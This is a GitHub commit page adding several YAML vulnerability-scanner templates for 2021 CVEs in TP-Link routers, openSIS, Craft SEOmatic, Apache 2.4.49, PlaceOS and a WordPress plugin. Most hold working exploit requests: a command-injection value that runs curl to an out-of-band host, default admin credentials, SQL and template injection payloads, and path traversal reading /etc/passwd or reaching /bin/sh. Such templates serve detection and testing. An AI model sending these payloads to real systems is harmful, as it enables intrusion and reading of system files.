-
Notifications
You must be signed in to change notification settings - Fork 8
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
1,000 changed files
with
52,639 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,67 @@ | ||
id: CVE-2021-41653 | ||
|
||
info: | ||
name: TP-Link - OS Command Injection | ||
author: gy741 | ||
severity: critical | ||
description: The PING function on the TP-Link TL-WR840N EU v5 router with firmware through TL-WR840N(EU)_V5_171211 is vulnerable to remote code execution via a specially crafted payload in an IP address input field. | ||
remediation: Upgrade the firmware to at least version "TL-WR840N(EU)_V5_211109". | ||
reference: | ||
- https://k4m1ll0.com/cve-2021-41653.html | ||
- https://nvd.nist.gov/vuln/detail/CVE-2021-41653 | ||
- https://www.tp-link.com/us/press/security-advisory/ | ||
- http://tp-link.com | ||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | ||
cvss-score: 9.8 | ||
cve-id: CVE-2021-41653 | ||
cwe-id: CWE-94 | ||
epss-score: 0.95374 | ||
epss-percentile: 0.99172 | ||
cpe: cpe:2.3:o:tp-link:tl-wr840n_firmware:*:*:*:*:*:*:*:* | ||
metadata: | ||
max-request: 2 | ||
vendor: tp-link | ||
product: tl-wr840n_firmware | ||
tags: cve,cve2021,tplink,rce,router | ||
variables: | ||
useragent: '{{rand_base(6)}}' | ||
|
||
http: | ||
- raw: | ||
- | | ||
POST /cgi?2 HTTP/1.1 | ||
Host: {{Hostname}} | ||
Content-Type: text/plain | ||
Referer: http://{{Hostname}}/mainFrame.htm | ||
Cookie: Authorization=Basic YWRtaW46YWRtaW4= | ||
[IPPING_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,6 | ||
dataBlockSize=64 | ||
timeout=1 | ||
numberOfRepetitions=4 | ||
host=$(echo 127.0.0.1; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}') | ||
X_TP_ConnName=ewan_ipoe_d | ||
diagnosticsState=Requested | ||
- | | ||
POST /cgi?7 HTTP/1.1 | ||
Host: {{Hostname}} | ||
Content-Type: text/plain | ||
Referer: http://{{Hostname}}/mainFrame.htm | ||
Cookie: Authorization=Basic YWRtaW46YWRtaW4= | ||
[ACT_OP_IPPING#0,0,0,0,0,0#0,0,0,0,0,0]0,0 | ||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
part: interactsh_protocol # Confirms the HTTP Interaction | ||
words: | ||
- "http" | ||
|
||
- type: word | ||
part: interactsh_request | ||
words: | ||
- "User-Agent: {{useragent}}" | ||
|
||
# digest: 490a004630440220752d1a35c5152419dacd9908a794244472a635bd8142f442d7cc7c88b204879b0220494cf93f6429b61a87d6c82bcd93eed1ea759f32f72eb7adfbbf425ed650b72c:922c64590222798bb761d5b6d8e72950 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,52 @@ | ||
id: CVE-2021-41691 | ||
|
||
info: | ||
name: openSIS Student Information System 8.0 SQL Injection | ||
author: Bartu Utku SARP | ||
severity: high | ||
description: openSIS Student Information System version 8.0 is susceptible to SQL injection via the student_id and TRANSFER[SCHOOL] parameters in POST request sent to /TransferredOutModal.php. | ||
remediation: | | ||
Apply the latest security patch or upgrade to a patched version of openSIS Student Information System to mitigate the SQL Injection vulnerability (CVE-2021-41691). | ||
reference: | ||
- https://securityforeveryone.com/blog/opensis-student-information-system-0-day-vulnerability-cve-2021-41691 | ||
- https://www.exploit-db.com/exploits/50637 | ||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4169 | ||
classification: | ||
cve-id: CVE-2021-41691 | ||
metadata: | ||
max-request: 2 | ||
tags: sqli,auth,edb,cve,cve2021,opensis | ||
variables: | ||
num: "999999999" | ||
|
||
http: | ||
- raw: | ||
- | | ||
POST /index.php HTTP/1.1 | ||
Host: {{Hostname}} | ||
Origin: {{BaseURL}} | ||
Content-Type: application/x-www-form-urlencoded | ||
USERNAME={{username}}&PASSWORD={{password}}&language=en&log= | ||
- | | ||
POST /TransferredOutModal.php?modfunc=detail HTTP/1.1 | ||
Host: {{Hostname}} | ||
Origin: {{BaseURL}} | ||
Content-Type: application/x-www-form-urlencoded | ||
student_id=updatexml(0x23,concat(1,md5({{num}})),1)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5 | ||
attack: pitchfork | ||
payloads: | ||
username: | ||
- student | ||
password: | ||
- student@123 | ||
matchers: | ||
- type: dsl | ||
dsl: | ||
- 'contains(body_2, "<!-- SQL STATEMENT:") && contains(body_2, "SELECT COUNT(STUDENT_ID)")' | ||
- 'status_code_2 == 200' | ||
condition: and | ||
|
||
# digest: 4b0a00483046022100d69a704ad325691722917a459e5254a92c6c17b1de1bf9f45e49b81414445ce5022100f9ddad6028eb7b1ad78e82fc59de1d3a40a132b8da744cbf8057af607d694558:922c64590222798bb761d5b6d8e72950 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,60 @@ | ||
id: CVE-2021-41749 | ||
|
||
info: | ||
name: CraftCMS SEOmatic - Server-Side Template Injection | ||
author: iamnoooob,ritikchaddha | ||
severity: critical | ||
description: | | ||
In the SEOmatic plugin up to 3.4.11 for Craft CMS 3, it is possible for unauthenticated attackers to perform a Server-Side. Template Injection, allowing for remote code execution. | ||
reference: | ||
- https://github.com/nystudio107/craft-seomatic/commit/3fee7d50147cdf3f999cfc1e04cbc3fb3d9f2f7d | ||
- https://nvd.nist.gov/vuln/detail/CVE-2021-41749 | ||
- https://github.com/nystudio107/craft-seomatic/blob/develop/CHANGELOG.md | ||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | ||
cvss-score: 9.8 | ||
cve-id: CVE-2021-41749 | ||
cwe-id: CWE-94 | ||
epss-score: 0.46254 | ||
epss-percentile: 0.97078 | ||
cpe: cpe:2.3:a:nystudio107:seomatic:*:*:*:*:*:craft_cms:*:* | ||
metadata: | ||
verified: true | ||
max-request: 2 | ||
vendor: nystudio107 | ||
product: seomatic | ||
framework: craft_cms | ||
shodan-query: 'X-Powered-By: Craft CMS html:"SEOmatic"' | ||
tags: cve,cve2021,craftcms,cms,ssti | ||
variables: | ||
num1: "{{rand_int(40000, 44800)}}" | ||
num2: "{{rand_int(40000, 44800)}}" | ||
result: "{{to_number(num1)*to_number(num2)}}" | ||
marker: "{{randstr}}" | ||
|
||
http: | ||
- raw: | ||
- |+ | ||
GET / HTTP/1.1 | ||
Host: {{Hostname}} | ||
X-Forwarded-Host: {{Hostname}}/{{marker}}{{{{num1}}*{{num2}}}} | ||
Cache-Control: max-age=0 | ||
- |+ | ||
GET / HTTP/1.1 | ||
Host: {{Hostname}} | ||
X-Forwarded-Host: xxx{{['cat /etc/passwd']|filter('system')}}bbb | ||
Cache-Control: max-age=0 | ||
skip-variables-check: true | ||
stop-at-first-match: true | ||
redirects: true | ||
max-redirects: 2 | ||
matchers: | ||
- type: dsl | ||
dsl: | ||
- 'contains(body_1, "/{{marker}}{{result}}") || regex("root:.*:0:0:", body_2)' | ||
- 'contains_any(body, "Craft CMS", "SEOmatic" ,"CRAFT_CSRF")' | ||
- 'status_code == 200' | ||
condition: and | ||
# digest: 490a0046304402203e7ed489ed44dbaf94282ae2b22ff831afb32e7fedc10b06aa445ecd91ac653802202e3fd014457cffd465c17a035306d3f49f3ba9ac5b84ccdbebdc4e0fd9db0dd2:922c64590222798bb761d5b6d8e72950 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,18 @@ | ||
id: CVE-2021-41773 | ||
info: | ||
name: RCE in Apache HTTP Server 2.4.49 | ||
author: RafaelCaria | ||
severity: critical | ||
tags: cve,cve2021,rce | ||
|
||
requests: | ||
- method: POST | ||
path: | ||
- '{{BaseURL}}/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash' | ||
body: 'echo;id' | ||
|
||
matchers: | ||
- type: regex | ||
part: body | ||
regex: | ||
- "(uid|gid|groups)=\\d+|bytes from \b(?:[0-9]{1,3}\\.){3}[0-9]{1,3}\b" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,64 @@ | ||
id: CVE-2021-41773 | ||
|
||
info: | ||
name: Apache 2.4.49 - Path Traversal and Remote Code Execution | ||
author: daffainfo,666asd | ||
severity: high | ||
description: | | ||
A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally, this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. | ||
remediation: | | ||
Upgrade Apache to version 2.4.50 or apply the relevant patch provided by the vendor. | ||
reference: | ||
- https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782 | ||
- https://nvd.nist.gov/vuln/detail/CVE-2021-41773 | ||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41773 | ||
- https://twitter.com/ptswarm/status/1445376079548624899 | ||
- https://twitter.com/h4x0r_dz/status/1445401960371429381 | ||
- https://github.com/blasty/CVE-2021-41773 | ||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N | ||
cvss-score: 7.5 | ||
cve-id: CVE-2021-41773 | ||
cwe-id: CWE-22 | ||
epss-score: 0.97424 | ||
epss-percentile: 0.99925 | ||
cpe: cpe:2.3:a:apache:http_server:2.4.49:*:*:*:*:*:*:* | ||
metadata: | ||
verified: true | ||
max-request: 3 | ||
vendor: apache | ||
product: http_server | ||
shodan-query: Apache 2.4.49 | ||
tags: cve,cve2021,lfi,rce,apache,misconfig,traversal,kev | ||
variables: | ||
cmd: "echo COP-37714-1202-EVC | rev" | ||
|
||
http: | ||
- raw: | ||
- | | ||
GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1 | ||
Host: {{Hostname}} | ||
- | | ||
GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1 | ||
Host: {{Hostname}} | ||
- | | ||
POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1 | ||
Host: {{Hostname}} | ||
Content-Type: application/x-www-form-urlencoded | ||
echo Content-Type: text/plain; echo; {{cmd}} | ||
stop-at-first-match: true | ||
|
||
matchers-condition: or | ||
matchers: | ||
- type: word | ||
name: RCE | ||
words: | ||
- "CVE-2021-41773-POC" | ||
|
||
- type: regex | ||
name: LFI | ||
regex: | ||
- "root:.*:0:0:" | ||
# digest: 4b0a00483046022100de8497f1c24918a9c7323beae8664ca742c5cbbe3657cab12758caa182e891d1022100fb74960000ce185cdd192c430b79f5f167632783e588f447813ee1a57fe0e4ec:922c64590222798bb761d5b6d8e72950 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,46 @@ | ||
id: CVE-2021-41826 | ||
|
||
info: | ||
name: PlaceOS 1.2109.1 - Open Redirection | ||
author: geeknik | ||
severity: medium | ||
description: PlaceOS Authentication Service before 1.29.10.0 allows app/controllers/auth/sessions_controller.rb open redirect. | ||
remediation: | | ||
Apply the latest security patch or update to PlaceOS 1.2109.2 or higher to fix the open redirection vulnerability. | ||
reference: | ||
- https://github.com/PlaceOS/auth/issues/36 | ||
- https://www.exploit-db.com/exploits/50359 | ||
- https://nvd.nist.gov/vuln/detail/CVE-2021-41826 | ||
- http://packetstormsecurity.com/files/164345/PlaceOS-1.2109.1-Open-Redirection.html | ||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N | ||
cvss-score: 6.1 | ||
cve-id: CVE-2021-41826 | ||
cwe-id: CWE-601 | ||
epss-score: 0.93913 | ||
epss-percentile: 0.98922 | ||
cpe: cpe:2.3:a:place:placeos_authentication:*:*:*:*:*:*:*:* | ||
metadata: | ||
max-request: 1 | ||
vendor: place | ||
product: placeos_authentication | ||
tags: redirect,edb,cve,packetstorm,cve2021,placeos | ||
|
||
http: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/auth/logout?continue=//interact.sh" | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: regex | ||
part: header | ||
regex: | ||
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' | ||
|
||
- type: status | ||
status: | ||
- 302 | ||
- 301 | ||
condition: or | ||
# digest: 4a0a00473045022100d0e3eef1d719b2eb5c45b70f78a97e5f08d65f2710ffb6af5b76c0a8108313af022042150ccc71dc5f934dc0bfc975778815f7def825f498e7317e0b430533fd20cf:922c64590222798bb761d5b6d8e72950 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,57 @@ | ||
id: CVE-2021-41836 | ||
|
||
info: | ||
name: "Fathom Analytics <= 3.0.4 - Stored Cross-Site Scripting" | ||
author: topscoder | ||
severity: medium | ||
description: "The Fathom Analytics WordPress plugin is vulnerable to Stored Cross-Site Scripting due to insufficient input validation and escaping via the $site_id parameter found in the ~/fathom-analytics.php file which allowed attackers with administrative user access to inject arbitrary web scripts, in versions up to and including 3.0.4. This affects multi-site installations where unfiltered_html is disabled for administrators, and sites where unfiltered_html is disabled." | ||
reference: | ||
- https://www.wordfence.com/vulnerability-advisories/#CVE-2021-41836 | ||
- https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=2641005%40fathom-analytics&new=2641005%40fathom-analytics&sfp_email=&sfph_mail= | ||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N | ||
cvss-score: 4.8 | ||
cve-id: CVE-2021-41836 | ||
metadata: | ||
fofa-query: "wp-content/plugins/fathom-analytics/" | ||
google-query: inurl:"/wp-content/plugins/fathom-analytics/" | ||
shodan-query: 'vuln:CVE-2021-41836' | ||
tags: cve,wordpress,wp-plugin,fathom-analytics,medium | ||
|
||
http: | ||
- method: GET | ||
redirects: true | ||
max-redirects: 3 | ||
path: | ||
- "{{BaseURL}}/wp-content/plugins/fathom-analytics/readme.txt" | ||
|
||
extractors: | ||
- type: regex | ||
name: version | ||
part: body | ||
group: 1 | ||
internal: true | ||
regex: | ||
- "(?mi)Stable tag: ([0-9.]+)" | ||
|
||
- type: regex | ||
name: version | ||
part: body | ||
group: 1 | ||
regex: | ||
- "(?mi)Stable tag: ([0-9.]+)" | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: status | ||
status: | ||
- 200 | ||
|
||
- type: word | ||
words: | ||
- "fathom-analytics" | ||
part: body | ||
|
||
- type: dsl | ||
dsl: | ||
- compare_versions(version, '<= 3.0.4') |
Oops, something went wrong.